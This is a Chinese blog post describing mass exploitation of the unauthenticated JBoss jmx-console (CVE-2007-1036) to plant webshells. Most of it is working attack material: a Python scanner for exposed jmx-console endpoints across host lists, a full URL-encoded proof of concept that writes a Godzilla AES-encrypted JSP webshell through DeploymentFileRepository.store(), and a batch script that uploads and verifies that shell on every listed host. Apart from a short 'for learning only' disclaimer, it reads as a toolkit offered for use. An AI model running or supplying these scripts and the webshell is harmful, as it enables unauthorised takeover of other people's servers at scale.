记录一次利用jboss任意生成代码漏洞批量获取shell

最新推荐文章于 2023-06-09 12:15:22 发布
最新推荐文章于 2023-06-09 12:15:22 发布
阅读量679 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kelenwait/article/details/115357712
版权

记录一次利用jboss任意生成代码漏洞批量获取shell

漏洞简介

漏洞编号:CVE-2007-1036 此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进入到jmx控制台,并在其中执行任何功能,该漏洞利用的是后台中jboss.admin -> DeploymentFileRepository -> store()方法,通过向四个参数传入信息,可上传shell。

渗透步骤

  1. 搭建或者寻找存在jboss的主机

    可通过fofa收集活本地搭建

  2. 编写脚本测试是否存在/jmx-console 未授权访问

'''
@Author         : fengling
'''
import requests
from random import choice
from common import header 
headers = {}

def check(url):
    url = url + '/jmx-console'
    try:
        headers["User-Agent"] = choice(header.USER_AGENTS)
        res = requests.get(url, headers=headers,timeout=10)
        text = res.text
        if(text.find('jboss.deployment')!=-1):
            return True
        else:
            return False
    except Exception as e:
        url = url.strip('\n')
        print('url:' + url + '访问异常')
        print(e)
        pass

if __name__ == "__main__":
    project = 'jbossJmxConsoleCmd'
    list = open(r'./url.txt', mode='r').readlines()
    saveFile = open(r'./'+project+'_target.txt', mode='ab+',buffering=0)
    print("读取到"+str(len(list))+"行数据")
    for url in list:
        if (url.find('http')==-1):
            url = 'http://'+url
        if (check(url)):
            saveFile.write(str(url).encode('utf-8')+b"")
            url = url.strip('\n')
            print('url:' + url + '检测成功')
        else:
            url = url.strip('\n')
            print('url:' + url + '检测失败')

    saveFile.close()

公用的代理 common/header.py

USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
    "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
    "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
    "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
    "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]
  1. 手动使用poc验证或编写脚本批量上传shell并验证

使用哥斯拉生成jsp木马,使用urlEncode后写入arg3参数
url中的参数: arg0代表war包的名称,arg1=文件名称,arg2=文件后缀名,arg3=文件内容
本例使用的是 arg0=Fengling.war arg1=fengling arg2=.jsp arg3=哥斯拉生成的木马

poc:

http://ip//jmx-console//HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=Fengling.war&argType=java.lang.String&&arg1=fengling&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25!+String+xc%3d%223c6e0b8a9c15224a%22%3b+String+pass%3d%22pass%22%3b+String+md5%3dmd5(pass%2bxc)%3b+class+X+extends+ClassLoader%7bpublic+X(ClassLoader+z)%7bsuper(z)%3b%7dpublic+Class+Q(byte%5b%5d+cb)%7breturn+super.defineClass(cb%2c+0%2c+cb.length)%3b%7d+%7dpublic+byte%5b%5d+x(byte%5b%5d+s%2cboolean+m)%7b+try%7bjavax.crypto.Cipher+c%3djavax.crypto.Cipher.getInstance(%22AES%22)%3bc.init(m%3f1%3a2%2cnew+javax.crypto.spec.SecretKeySpec(xc.getBytes()%2c%22AES%22))%3breturn+c.doFinal(s)%3b+%7dcatch+(Exception+e)%7breturn+null%3b+%7d%7d+public+static+String+md5(String+s)+%7bString+ret+%3d+null%3btry+%7bjava.security.MessageDigest+m%3bm+%3d+java.security.MessageDigest.getInstance(%22MD5%22)%3bm.update(s.getBytes()%2c+0%2c+s.length())%3bret+%3d+new+java.math.BigInteger(1%2c+m.digest()).toString(16).toUpperCase()%3b%7d+catch+(Exception+e)+%7b%7dreturn+ret%3b+%7d+public+static+String+base64Encode(byte%5b%5d+bs)+throws+Exception+%7bClass+base64%3bString+value+%3d+null%3btry+%7bbase64%3dClass.forName(%22java.util.Base64%22)%3bObject+Encoder+%3d+base64.getMethod(%22getEncoder%22%2c+null).invoke(base64%2c+null)%3bvalue+%3d+(String)Encoder.getClass().getMethod(%22encodeToString%22%2c+new+Class%5b%5d+%7b+byte%5b%5d.class+%7d).invoke(Encoder%2c+new+Object%5b%5d+%7b+bs+%7d)%3b%7d+catch+(Exception+e)+%7btry+%7b+base64%3dClass.forName(%22sun.misc.BASE64Encoder%22)%3b+Object+Encoder+%3d+base64.newInstance()%3b+value+%3d+(String)Encoder.getClass().getMethod(%22encode%22%2c+new+Class%5b%5d+%7b+byte%5b%5d.class+%7d).invoke(Encoder%2c+new+Object%5b%5d+%7b+bs+%7d)%3b%7d+catch+(Exception+e2)+%7b%7d%7dreturn+value%3b+%7d+public+static+byte%5b%5d+base64Decode(String+bs)+throws+Exception+%7bClass+base64%3bbyte%5b%5d+value+%3d+null%3btry+%7bbase64%3dClass.forName(%22java.util.Base64%22)%3bObject+decoder+%3d+base64.getMethod(%22getDecoder%22%2c+null).invoke(base64%2c+null)%3bvalue+%3d+(byte%5b%5d)decoder.getClass().getMethod(%22decode%22%2c+new+Class%5b%5d+%7b+String.class+%7d).invoke(decoder%2c+new+Object%5b%5d+%7b+bs+%7d)%3b%7d+catch+(Exception+e)+%7btry+%7b+base64%3dClass.forName(%22sun.misc.BASE64Decoder%22)%3b+Object+decoder+%3d+base64.newInstance()%3b+value+%3d+(byte%5b%5d)decoder.getClass().getMethod(%22decodeBuffer%22%2c+new+Class%5b%5d+%7b+String.class+%7d).invoke(decoder%2c+new+Object%5b%5d+%7b+bs+%7d)%3b%7d+catch+(Exception+e2)+%7b%7d%7dreturn+value%3b+%7d%25%3e%3c%25+try%7bbyte%5b%5d+data%3dbase64Decode(request.getParameter(pass))%3bdata%3dx(data%2c+false)%3bif+(session.getAttribute(%22payload%22)%3d%3dnull)%7bsession.setAttribute(%22payload%22%2cnew+X(pageContext.getClass().getClassLoader()).Q(data))%3b%7delse%7brequest.setAttribute(%22parameters%22%2c+new+String(data))%3bObject+f%3d((Class)session.getAttribute(%22payload%22)).newInstance()%3bf.equals(pageContext)%3bresponse.getWriter().write(md5.substring(0%2c16))%3bresponse.getWriter().write(base64Encode(x(base64Decode(f.toString())%2c+true)))%3bresponse.getWriter().write(md5.substring(16))%3b%7d+%7dcatch+(Exception+e)%7b%7d%25%3e&argType=boolean&arg4=True

批量检测上传验证脚本:

import requests
from random import choice
from common import header
import time
headers = {}


def check(url):
    url = url + '/jmx-console//HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=Fengling.war&argType=java.lang.String&&arg1=fengling&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25!+String+xc%3d%223c6e0b8a9c15224a%22%3b+String+pass%3d%22pass%22%3b+String+md5%3dmd5(pass%2bxc)%3b+class+X+extends+ClassLoader%7bpublic+X(ClassLoader+z)%7bsuper(z)%3b%7dpublic+Class+Q(byte%5b%5d+cb)%7breturn+super.defineClass(cb%2c+0%2c+cb.length)%3b%7d+%7dpublic+byte%5b%5d+x(byte%5b%5d+s%2cboolean+m)%7b+try%7bjavax.crypto.Cipher+c%3djavax.crypto.Cipher.getInstance(%22AES%22)%3bc.init(m%3f1%3a2%2cnew+javax.crypto.spec.SecretKeySpec(xc.getBytes()%2c%22AES%22))%3breturn+c.doFinal(s)%3b+%7dcatch+(Exception+e)%7breturn+null%3b+%7d%7d+public+static+String+md5(String+s)+%7bString+ret+%3d+null%3btry+%7bjava.security.MessageDigest+m%3bm+%3d+java.security.MessageDigest.getInstance(%22MD5%22)%3bm.update(s.getBytes()%2c+0%2c+s.length())%3bret+%3d+new+java.math.BigInteger(1%2c+m.digest()).toString(16).toUpperCase()%3b%7d+catch+(Exception+e)+%7b%7dreturn+ret%3b+%7d+public+static+String+base64Encode(byte%5b%5d+bs)+throws+Exception+%7bClass+base64%3bString+value+%3d+null%3btry+%7bbase64%3dClass.forName(%22java.util.Base64%22)%3bObject+Encoder+%3d+base64.getMethod(%22getEncoder%22%2c+null).invoke(base64%2c+null)%3bvalue+%3d+(String)Encoder.getClass().getMethod(%22encodeToString%22%2c+new+Class%5b%5d+%7b+byte%5b%5d.class+%7d).invoke(Encoder%2c+new+Object%5b%5d+%7b+bs+%7d)%3b%7d+catch+(Exception+e)+%7btry+%7b+base64%3dClass.forName(%22sun.misc.BASE64Encoder%22)%3b+Object+Encoder+%3d+base64.newInstance()%3b+value+%3d+(String)Encoder.getClass().getMethod(%22encode%22%2c+new+Class%5b%5d+%7b+byte%5b%5d.class+%7d).invoke(Encoder%2c+new+Object%5b%5d+%7b+bs+%7d)%3b%7d+catch+(Exception+e2)+%7b%7d%7dreturn+value%3b+%7d+public+static+byte%5b%5d+base64Decode(String+bs)+throws+Exception+%7bClass+base64%3bbyte%5b%5d+value+%3d+null%3btry+%7bbase64%3dClass.forName(%22java.util.Base64%22)%3bObject+decoder+%3d+base64.getMethod(%22getDecoder%22%2c+null).invoke(base64%2c+null)%3bvalue+%3d+(byte%5b%5d)decoder.getClass().getMethod(%22decode%22%2c+new+Class%5b%5d+%7b+String.class+%7d).invoke(decoder%2c+new+Object%5b%5d+%7b+bs+%7d)%3b%7d+catch+(Exception+e)+%7btry+%7b+base64%3dClass.forName(%22sun.misc.BASE64Decoder%22)%3b+Object+decoder+%3d+base64.newInstance()%3b+value+%3d+(byte%5b%5d)decoder.getClass().getMethod(%22decodeBuffer%22%2c+new+Class%5b%5d+%7b+String.class+%7d).invoke(decoder%2c+new+Object%5b%5d+%7b+bs+%7d)%3b%7d+catch+(Exception+e2)+%7b%7d%7dreturn+value%3b+%7d%25%3e%3c%25+try%7bbyte%5b%5d+data%3dbase64Decode(request.getParameter(pass))%3bdata%3dx(data%2c+false)%3bif+(session.getAttribute(%22payload%22)%3d%3dnull)%7bsession.setAttribute(%22payload%22%2cnew+X(pageContext.getClass().getClassLoader()).Q(data))%3b%7delse%7brequest.setAttribute(%22parameters%22%2c+new+String(data))%3bObject+f%3d((Class)session.getAttribute(%22payload%22)).newInstance()%3bf.equals(pageContext)%3bresponse.getWriter().write(md5.substring(0%2c16))%3bresponse.getWriter().write(base64Encode(x(base64Decode(f.toString())%2c+true)))%3bresponse.getWriter().write(md5.substring(16))%3b%7d+%7dcatch+(Exception+e)%7b%7d%25%3e&argType=boolean&arg4=True'
    try:
        headers["User-Agent"] = choice(header.USER_AGENTS)
        res = requests.get(url, headers=headers,timeout=10)
        if(res.status_code==200):
            time.sleep(7)
            print("检查shell")
            #再次检验
            checkUrl = url+'/Fengling/fengling.jsp'
            shellRes = requests.get(checkUrl, headers=headers,timeout=10)
            if(shellRes.status_code==200):
                return True
            else:
                return False
        else:
            return False

    except Exception as e:
        url = url.strip('\n')
        print('url:' + url + '访问异常')
        print(e)
        pass

if __name__ == "__main__":
    project = 'jbossJmxShellCheck'
    list = open(r'./checkJboosShellurl.txt', mode='r').readlines()
    saveFile = open(r'./'+project+'_target.txt', mode='ab+',buffering=0)
    print("读取到"+str(len(list))+"行数据")
    for url in list:
        if (url.find('http')==-1):
            url = 'http://'+url
        if (check(url)):
            saveFile.write(str(url).encode('utf-8')+b"")
            url = url.strip('\n')
            print('url:' + url + '检测成功')
        else:
            url = url.strip('\n')
            print('url:' + url + '检测失败')

    saveFile.close()
  1. 使用哥斯拉连接
    使用哥斯拉连接

注:文章分享内容仅供学习和交流,切勿用于违法行为,造成一切后果与作者无关。

烽铃子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jboss漏洞getshell
weixin_43999372的博客
11-07 1084
前言 最近感觉有点无聊,搞了国外一些站,学到一些知识,主要了解了windos中一些命令. 1.信息收集 首先访问该站,把目录扫描起,然后nmap扫描看看,然后找该站是否存在什么漏洞。然而并没有,扫描目录发现 8080/jmx-console/,发现是jboss的站,百度到jboss可以部署war包getshell,访问http://xxxx:8080//jmx-console/ 2.漏洞利用 全局...
Jboss getshell
aiguang4476的博客
05-08 3522
Jboss 的安装需要 JDK 环境 JDK+JBOSS 包 初始环境配置 系统变量名 变量值 PATH %JAVA_HOME%\bin;%JAVA_HOME%\jre\bin JAVA_HOME C:\Program Files (x86)\Java\jdk1.6.0_43 CLASSPATH .;%...
WRMPS经典Cookie欺骗漏洞批量拿下shell-黑客博客
weixin_34138056的博客
01-08 226
WRMPS(网人信息发布系统)是一款功能非常强大的地方门户系统,用它做门户网站再好不过了。不过最近发现一个很老的漏洞,很多人会问:既然是很老的漏洞了,危险漫步你为什么还拿出来呢?是因为这个漏洞利用率非常高,以至于现在都是。下面我危险漫步就为大家介绍这个漏洞利用方法。漏洞范围很广,后台没有开启认证码或者后台认证码为默认的WRMPS6。一、拿后台打开Google搜索“Powered By WRMPS...
批量漏洞shell工具
dcdmer1211的博客
02-21 668
对于我们自己,学习shell是为了自动化,而自动化则是为了提高工作效率,提高产出。
网站漏洞扫描注入批量getshell工具
ghoulcheen的博客
10-16 3511
好用的辅助软件很少 但是小编能保证这个工具一定好用 而且效果是杠杠的! 懂得人一看就懂,不懂得请绕道 下载好以后请联系软件上的联系方式,与管理员取得联系后 会得到试用权限,完全免费! 下载地址 https://www.lanzous.com/i6t89vi ...
php探针批量shell,地下黑产:自动批量SHELL一条龙
weixin_33793620的博客
03-20 915
我偶然接触黑产冰山一角,得知黑产的发展比我们想象还快,已经进化到全自动批量扫描SHELL一条龙,结合前辈揭露的,他们配合,从批量扫描到挂马到挂黑页等,一个傻瓜按钮就完成。我们看看以前,下发命令实现全自动发布广告,再结合现在的批量SHELL,很多中小网站都中标,我揭露的只是他们利用网上已公布的CMS漏洞来写的一些批量工具,这还只是公布的一个漏洞,CMS那么多漏洞,如果都被利用了,想想都可怕。URL自...
JAVA上百实例源码以及开源项目源代码
09-17
 数字证书:从文件中读取数字证书,生成文件输入流,输入文件为c:/mycert.cer,获取一个处理X.509证书的证书工厂…… Java+ajax写的登录实例 1个目标文件 内容索引:Java源码,初学实例,ajax,登录  一个Java+ajax写...
JAVA上百实例源码以及开源项目
01-03
 数字证书:从文件中读取数字证书,生成文件输入流,输入文件为c:/mycert.cer,获取一个处理X.509证书的证书工厂…… Java+ajax写的登录实例 1个目标文件 内容索引:Java源码,初学实例,ajax,登录  一个Java+ajax写...
java开源包8
06-28
nfs-rpc是一个集成了各种知名通信框架的高性能RPC框架,目前其最好的性能为在采用grizzly作为通信框架,采用pb作为序列化/反序列化时,tps为168k次/秒。 其支持的功能主要为: 1、透明的调用远端服务器提供的功能...
java开源包10
06-28
nfs-rpc是一个集成了各种知名通信框架的高性能RPC框架,目前其最好的性能为在采用grizzly作为通信框架,采用pb作为序列化/反序列化时,tps为168k次/秒。 其支持的功能主要为: 1、透明的调用远端服务器提供的功能...
web渗透之——任意代码执行漏洞
wsnbbz的博客
03-04 1481
漏洞原理 当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能够控制这个字符串,将造成代码注入漏洞 在php中: eval,assert,将字符串当成代码执行 preg_replace("/wslp/e","$xr",“wslp”);用第二个参数的执行结果替换第三个参数里的第一个参数指定的值 漏洞形成 如果被执行的字符串是通过前端参数传过来的攻击代码,或者数据库里被植入攻击代码数据,就...
Jboss弱口令Getshell复现
懂进攻知防守
07-24 695
JBoss Administration Console存在默认账号密码admin/admin,如果Administration Console可以登录,就可以在后台部署war包getshell
批量拿webshell工具【最新】
12-21 564
说到批量拿web shell工具【最新】内部有多个漏洞,可自动进行网址采集,自动爬虫多个引擎和友情链接 ,过狗一句话,轻松日出上千。
一个jboss启动shell脚本
acg6962的博客
08-18 312
  脚本1: #!/bin/sh # paulo@evencom.com.br #JBOSS_HOME JBOSS_HOME="/opt/app/jboss-eap-6.3" JAVAPTH="/opt/app/jdk1.7.0/bin" case "$1" in start) echo "Starting JBoss EAP-6.3.0..." exp...
linux下jboss启动shell脚本
weixin_30718391的博客
12-11 145
启动脚本如下: #!/bin/bash echo "Shell start ....." DEPLOY_PATH=/wls/wls81/pmfJbossserver/jboss-as-7.1.1.Final JENKINS_PATH=/wls/wls81/tools/workspace/pmf_dev/pmf-web/target APP_NAME=pmf-web.war e...
JBoss常见漏洞整理
热门推荐
寒星的博客
06-01 1万+
JBoss常见漏洞整理 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 JBoss高危漏洞主要涉及到以下两种。 第一种是利用未授权访问进入JBoss后台进行文件上传的漏洞,例如:CVE-2007-1036CVE-2010-0738,CVE-2006.
Exploit/CVE-2010-0738
最新发布
男神的专栏
06-09 1135
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
JBoss高危漏洞分析
02-25 416
前言 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值